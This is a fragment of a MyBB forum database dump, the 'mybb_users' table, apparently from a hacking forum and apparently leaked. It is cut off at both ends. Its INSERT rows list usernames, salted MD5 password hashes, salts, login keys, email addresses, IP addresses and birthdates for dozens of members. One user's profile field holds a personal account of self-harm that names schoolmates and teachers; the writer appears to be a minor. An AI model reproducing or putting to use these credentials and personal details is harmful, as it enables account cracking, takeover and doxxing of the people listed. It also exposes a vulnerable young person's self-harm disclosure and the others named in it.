'', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '1', '', '49.248.27.150', '0', '838343574', '', '33959', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:3:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"acid\";a:1:{i:26;a:5:{s:4:\"acid\";i:26;s:4:\"name\";s:6:\"Sticky\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_2_44_39.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:1:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '31'); INSERT INTO mybb_users VALUES('5', 'Timmy', 'cd1f8e823c59e72f9da6f2b338541411', 'eILkwX4k', 'mkq25YxVnnCuRMdqvkjR4TRXXLwB6xPaDe3pX2AByKw2PILYeO', 'something@bindas.com', '287', 'images/avatars/LH Misc./Yomoma.gif?dateline=1346643810', '64|64', 'gallery', '9', '13', '0', '', '1340516797', '1352533983', '1352531645', '1352530926', '', '0', '', '', '', '', 'all', '[url=http://l33thacking.net/user-5.html][align=center][img]http://l33thacking.net/images/CoderGreen/logocg.png[/img][/align][/url]', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '0', '1', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '5', '', '72.231.24.165', '0', '1223104677', '', '73825', '1', '6', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '3', '0', '', NULL, 'a:3:{s:4:\"apid\";a:1:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"acid\";a:2:{i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:24;a:5:{s:4:\"acid\";i:24;s:4:\"name\";s:7:\"YouTube\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_1_44_00.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}}', '55'); INSERT INTO mybb_users VALUES('6', 'xlesnyx12', '2c3f88a56ae550bb51bfa94ca3c16cf9', 'hqDYPNeF', 'cQ8m9FUNRed315hsahAvqjEDYfkAMPcE79T5Et1MbWirhThHIA', 'xlesnyx12@o2.pl', '15', '', '', '', '2', '', '0', '', '1341496105', '1342302892', '1341496717', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '2', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '77.253.195.126', '41.174.8.40', '1308476286', '699271208', '', '867', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '15'); INSERT INTO mybb_users VALUES('9', 'p420', 'bbeab4ba9da453ca4d0c6a40b1cd4d79', 'ndtLvfZu', 'QASdmfpZDyXlfkGCISosAIpLoJJgnezi4npwysNqTu1EGzNiks', 'patonll93@gmail.com', '106', 'http://l33thavatars.netne.net/money/?dateline=1350433298', '48|48', 'remote', '2', '13', '13', '', '1341695346', '1352526844', '1352391986', '1352526819', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '4', '46.7.37.171', '72.231.24.165', '772220331', '1223104677', '', '24312', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:3:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"acid\";a:1:{i:26;a:5:{s:4:\"acid\";i:26;s:4:\"name\";s:6:\"Sticky\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_2_44_39.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:1:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '12'); INSERT INTO mybb_users VALUES('7', 'Romdu62', '20d6223c4b0195876f67cecdb59b9a0c', 'WuFYXrVN', '59BSqfZbrm9GJxhxMHSHGIDHk14mnQw6W7kX5ATQwNN6MG6R7x', 'straiqz@gmail.com', '91', '', '', '', '2', '', '0', '', '1341660267', '1352536198', '1352350356', '1352536047', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '5', '90.58.254.83', '72.231.24.165', '1513815635', '1223104677', '', '16873', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '12'); INSERT INTO mybb_users VALUES('8', 'spacefish36', '2718275dbeb85365b53d80e7764854b5', 'LA5gxSdg', 'gPU4B6tUTZ1aYwyfUSomJOG8Kz3VzMmyKfVeFlF4e9XGjVkL3v', 'spacefish35@yahoo.com', '71', '', '', '', '2', '', '0', '', '1341665208', '1352527919', '1352525516', '1352527686', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '3', '108.235.74.2', '72.231.24.165', '1827359234', '1223104677', 'english', '15659', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '15'); INSERT INTO mybb_users VALUES('11', 'Reminiscing ?', '5408a5bd33c5aa235698f8d21138dd9b', '6o1vpzDy', '7rB9Lo5he4gft1KW3dcEyM5PNQOjg47Zu64gcNhTXoLmDkHWwG', 'andre@exiledforums.co.uk', '6', './uploads/avatars/avatar_11.jpg?dateline=1342041947', '120|150', 'upload', '2', '', '0', '', '1342041124', '1342431612', '1342388923', '1342211111', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '92.25.20.80', '78.146.232.150', '1545147472', '1318250646', '', '5984', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('10', 'swa4567', '8ab7eb1e5c564a689219240150aaadff', 'Ul54AhOn', 'zhCvm4OT4DigEQZaIcwmYfLZNUqDArLfC6q2BeBkh8r4m8pznS', 'sewarrington@aol.com', '33', '', '', '', '2', '', '0', '', '1341932547', '1350860448', '1349923842', '1349923699', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '86.186.29.81', '72.231.24.165', '1455037777', '1223104677', '', '7817', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '7'); INSERT INTO mybb_users VALUES('12', 'jonas83', '8c3c17a84c959653216ba2fab3151933', '8G18qRhq', 'Z73yJgEXebDjF1ycihQV82XquQTmNLXRo3p462upTmzvsHNqH3', 'jonas83felix@gmail.com', '14', 'images/avatars/LH Misc./f5.gif?dateline=1349473857', '100|100', 'gallery', '2', '', '0', '', '1342124118', '1349475148', '1345144436', '1349475145', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '1', '0', '99.251.136.11', '72.231.24.165', '1677428747', '1223104677', '', '3462', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '5'); INSERT INTO mybb_users VALUES('13', 'unixmoon', '496d72e478374bd9c362211196219c34', 'luyGQd12', 'w6GP7R6U6AJwGEBVkfnxU7YDcbhjUqOrSjckkkwOdxEroV5SDy', 'unixmoon@yahoo.com', '10', '', '', '', '2', '', '0', '', '1342145323', '1346971734', '1345419500', '1346971723', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '146.171.254.97', '72.229.164.105', '-1834221983', '1223009385', '', '2743', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '4'); INSERT INTO mybb_users VALUES('17', 'khade009', '343663a264e9b84c388e65b83a61a84f', 'kdBZOtoR', 'p32Mrmp4q7N9ALNfy8uKw7d4MTKqqc4T4Uk4vpICN32XqQdxXa', 'khade009@gmail.com', '7', '', '', '', '2', '', '0', '', '1342352787', '1346902774', '1346789058', '1346789028', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '0', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '124.155.241.141', '72.229.164.105', '2090594701', '1223009385', '', '857', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '3'); INSERT INTO mybb_users VALUES('18', 'MartyFogerlie', '2f56e62cc98b0a26d930758695e13e7b', '2y2n8rsP', 'Iydnnoaf8zDBxFOfWUCONgpPBu7hN2LZg6knW3hJzg1ifqkMEY', 'mary.jon28@yahoo.com', '1', '', '', '', '2', '', '0', '', '1342428979', '1342429062', '1342429062', '1342429044', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '115.249.239.138', '115.249.239.138', '1945759626', '1945759626', '', '87', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('19', 'yazz', '7708f2c57cfff52639bb531c1a1d06b7', 'rPHxmRuz', '9WLZH9tQctaKMEjZ1zquO76w5mDFMPig2w65HCRTrQSWWLI79F', 'Yasin.yusuf23@yahoo.com', '2', '', '', '', '2', '', '0', '', '1342470546', '1345145544', '1344372372', '1345145459', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '', '0', '0', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '', '41.174.5.68', '0', '699270468', '', '1428', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('20', 'JakeUS', '5740be169e3acaf01303c9569808e04e', 'fUMjf4El', 'O75ENNWMeueY7gKlT9qGEig3QLN1VCcnq8YoKVSG7t5UaMXyoQ', 'jakeushf123@gmail.com', '47', '', '', '', '2', '', '0', '', '1343915769', '1350505107', '1350167815', '1347927900', '', '0', '', '', '', '', 'all', '[align=center][img]http://i.imgur.com/T3xOc.png[/img][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '3', '10', '24.59.244.35', '24.59.243.229', '406582307', '406582245', '', '26379', '1', '16', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '5'); INSERT INTO mybb_users VALUES('23', 'menaji13@hotmail.com', '44b8a295f4f2729db7dde4672a070727', 'oXynwrEM', '229uXyUqZQttMmqvuCPDRIoFxo9iSTGjMrL88n4D9wahoFILjO', 'menaji13@hotmail.com', '0', '', '', '', '2', '', '0', '', '1343946510', '1348018274', '1343947908', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '87.55.209.8', '72.231.24.165', '1463275784', '1223104677', '', '431', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('24', 'vtec4life', '208cb20b2a99b489e8f9c91d3569f0cc', 'Gub7fTmC', 'qzHJtTLpSvYS45mCW6yrgLJokMtopCpeNZvTV5bbD55zFu3fy7', 'vtecv@ymail.com', '0', '', '', '', '2', '', '0', '', '1343950326', '1343975842', '1343954225', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '97.94.186.133', '97.94.186.133', '1633598085', '1633598085', '', '474', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('26', 'bixlow803', 'f3499ee5cc99f639896dd1226e688800', 'sFC8uKm3', 'f7feFAoYf6aith4IgcFW5wBLa7nZOYRvo6evv2DJ7NBi2dBvE3', 'bixlowhood@ymail.com', '3', '', '', '', '2', '', '0', '', '1343987521', '1344841701', '1344630735', '1344118953', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '203.177.42.214', '121.54.53.253', '-877581610', '2033595901', '', '2555', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('27', 'Hil', 'b5ea60cbe2244f8215251793045441d6', 'B8QUP8R7', 'g8PjaO5PjGncqYSls8MuUiagcMVdfJTdb4vXWa2ujHwYhzeLEj', 'kristoffer_laukamp@hotmail.com', '2', '', '', '', '2', '', '0', '', '1343995649', '1349778347', '1348018288', '1344282662', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '80.72.152.146', '80.72.152.146', '1346934930', '1346934930', '', '1743', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('31', 'based', 'fa39b3a14ab522c616c241a5e0f1a8df', '7oFW7hXv', 'PWwgQYpl8C4sFZborbnkm4UeP9zuPvEZpS4pLb7wkVknIgdmhd', 'itaskforce96@yahoo.com', '0', './uploads/avatars/avatar_31.png?dateline=1344084360', '120|120', 'upload', '2', '', '0', '', '1344084212', '1348018305', '1344084386', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '8', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '20', '0', '0', '174.61.77.86', '72.231.24.165', '-1371714218', '1223104677', 'english', '177', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('45', 'dstaire7', 'b5ef8a26ebc0b06711ebbbe73668940e', 'zH2BkdFG', 'kH2sf6gpe84v9hqDgugUIj2ElcnYKHsocUf2DdEFISJLIWMg9f', 'dstaire7@gmail.com', '0', '', '', '', '2', '', '0', '', '1344882945', '1344883160', '1344882945', '0', '', '0', '', '', '', '', 'all', '', '0', '0', '0', '0', '0', '0', '0', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '117.204.211.6', '117.204.211.6', '1976357638', '1976357638', '', '215', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('44', 'M4573RH4X0R', '35828267644205fb7e6b77f931cb551c', 'ojF9XPe7', 'y6ykX9sCinfZRGdO2bkEYaXamGQOnWscV2wiQvSLMWyvORjxgT', 'malitschr@gmail.com', '2', '', '', '', '2', '', '0', '', '1344830476', '1344876923', '1344831283', '1344831216', '', '0', '', '', '', '', 'all', '', '1', '0', '2', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '207.172.50.206', '207.172.50.206', '-810798386', '-810798386', '', '856', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('48', 'BurnsH4X', '2c67f3827aa89f8d2e61e6ed16f0c2b8', 'VAWNjDht', 'qkAax1EB3yojN51X1utPxILDlP5A7awaxYQKkWCWTSbTG8zDjs', 'red-67-22@hotmail.com', '10', '', '', '', '2', '', '0', '', '1344941742', '1351967295', '1351949787', '1346342033', '', '0', '', '', '', '', 'all', '', '0', '1', '1', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '100', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '78.133.53.116', '195.158.72.91', '1317352820', '-1013036965', 'english', '34237', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('50', 'sana khan', '3b8a60eb180f135a8ab6ea33be3d3138', 'HSziqtSh', 'sItm8oiT7M9lGbPHLh8Uo1EHCcaQWzIY6LfN3txdgYFhHnQr2e', 'engr.swe.001@gmail.com', '4', './uploads/avatars/avatar_50.jpg?dateline=1344955086', '76|150', 'upload', '2', '', '0', '', '1344952462', '1346448942', '1345601732', '1345135217', '', '0', '', '', '', '19-9-1991', 'all', '', '1', '0', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '10', '0', '-4', '0', '2', '1', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', 'i am a student of software engineering(final year).', '0', '0', '0', '182.177.26.34', '182.177.53.90', '-1229907422', '-1229900454', '', '12585', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('51', 'SAPBasisWorld', '89d441b29348f1866fef556864023f17', 'dIu8zcJv', 'NGiYhVsik4HSUrGddsYZlSSDDBSjYQKf9Sboa2NR5bcW3GdXQP', 'bogalaaruna@hotmail.com', '1', '', '', '', '2', '', '0', '', '1344956262', '1344958318', '1344956262', '1344957203', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '180.215.45.255', '180.215.45.255', '-1260966401', '-1260966401', '', '2056', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('231', 'Rhythm', 'e840ce4f009622322ada551541121384', 'v5eqEPwm', 'cIs8U8q8lKnhCO2XkGUU83oAU1hvUQVqQpfJo5n2AY4BLfy9Ce', 'Rhythm@BIGheckers.com', '1', '', '', '', '7', '', '0', '', '1349643098', '1350428909', '1350419800', '1349643453', '', '0', '', '', '', '24-11-1996', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '99.233.52.247', '72.231.24.165', '1676227831', '1223104677', '', '785', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('53', 'sirchamp', '5e7c62ef1b3d88a04f249ee1442e463f', '8YgSYQcX', '3BslnogFyAAF2nwcoo8lTxjYNXM1KLLxDNaF7Bkamvq8KK91bS', 'phonomarco@yahoo.de', '181', './uploads/avatars/avatar_53.jpg?dateline=1344976802', '120|92', 'upload', '9', '17,21', '9', '', '1344976570', '1352744517', '1352740728', '1352663068', '', '0', '', '', '', '', 'all', '[img]http://teamlegitclan.files.wordpress.com/2007/09/steamupdate9rr.gif[/img]\r\n', '1', '1', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-1', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '19', '188.155.56.90', '188.155.56.90', '-1130678182', '-1130678182', 'english', '210447', '1', '79', '0', '15', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:3:{s:4:\"acid\";a:2:{i:13;a:5:{s:4:\"acid\";i:13;s:4:\"name\";s:5:\"Gamer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:1:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '21'); INSERT INTO mybb_users VALUES('82', 'iTzIpod', '30b50eaad86257c6029b3e27d979cf45', '3FlEluRo', 'rDWhPVdUGyElTUpc6oJ1PmfObywMFLGrEYHJj5WOEPUPB2DqoG', 'iTzIpod@hotmail.com', '1536', 'http://i.imgur.com/oBAmZ.gif?dateline=1352597023', '100|100', 'remote', '9', '20,17,13,21', '13', 'Unique Leader | Ex Mod', '1345502806', '1352662182', '1352650948', '1352662182', '', '0', '', '', 'iTzIpod@hotmail.com', '', 'none', '[align=center]\r\n[url=http://customhits.net/?ref=73] [img]http://customhits.net/promo/banner.gif[/img][/url]\r\nSkype: iTzIpod\r\nPSN: SoaR__Drastic\r\n[/align]', '1', '0', '0', '0', '1', '0', '2', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-5', '0', '2', '61,1,20,9,62,194', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '09/30/12 Aliyah and I are no longer friends because of Christian Henriquez. :/ \r\n10/01/12 Aliyah and Me are friends again.. Aliyah kisses me. \r\nMet Stephanie Bortolussi again at Confirmation Registration night.\r\nMade a new Twitter : @I_Am_A_Llama__\r\nGot into a big fight with Aliyah. No longer friends. (1 Week Duration) \r\nFight was because she didn\'t reply to me fast enough... (Stupid action I made)..\r\nFriends again 2 weeks later after fight. Kissed on lips.\r\nAsked her out. Got rejected.\r\n:/ Asked her out because everyday of school, she kisses me, hugs me, winks @me, flirts with me, etc. Loves me ;) Cares for me :P\r\nStarted cutting myself because of the rejection..\r\nCut my wrists in school, got caught by students.\r\nAliyah, Danniel J, & Kojo told Mr. Simunec during Volleyball practice at lunch.\r\nLast recess of that day, Mr. Simunec talked to me.\r\nNext day, got in trouble by Mr. Coulson. Questioning me..\r\nStarted crying.. Was in need of a friend, no one was there for me..\r\nI saw Aliyah.. She didn\'t feel bad. She knew what she was doing was the right thing to do but was hurting me.. I felt betrayed because Aliyah was copying + pasting me and her\'s conversation...\r\nBetrayal.\r\nI felt betrayed. She printed it out and gave it to Mr. Simunec and then Mr. Simunec gave it to Mr. Coulson..\r\nGot in trouble.\r\n\r\nParents came. And then got grounded. -.-\r\n\r\nWhat to do... :/\r\nPromised to talk to Aliyah tomorrow. I don\'t know if I should..\r\n\r\n[img]http://i.imgur.com/QTiAV.gif[/img] Reloadzor\'s Animated iTzIpod Text.', '0', '14', '29', '24.212.197.164', '24.212.197.164', '416597412', '416597412', '', '1148388', '1', '65', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:4:{s:4:\"apid\";a:3:{i:1;a:5:{s:4:\"apid\";i:1;s:4:\"name\";s:7:\"Spammer\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/posts_21_10_12_12_10_50.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:2;a:5:{s:4:\"apid\";i:2;s:4:\"name\";s:13:\"Posting Freak\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/posts_21_10_12_12_30_32.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"acid\";a:24:{i:20;a:5:{s:4:\"acid\";i:20;s:4:\"name\";s:7:\"Thinker\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_27_19.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:13;a:5:{s:4:\"acid\";i:13;s:4:\"name\";s:5:\"Gamer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:9;a:5:{s:4:\"acid\";i:9;s:4:\"name\";s:9:\"Referrer 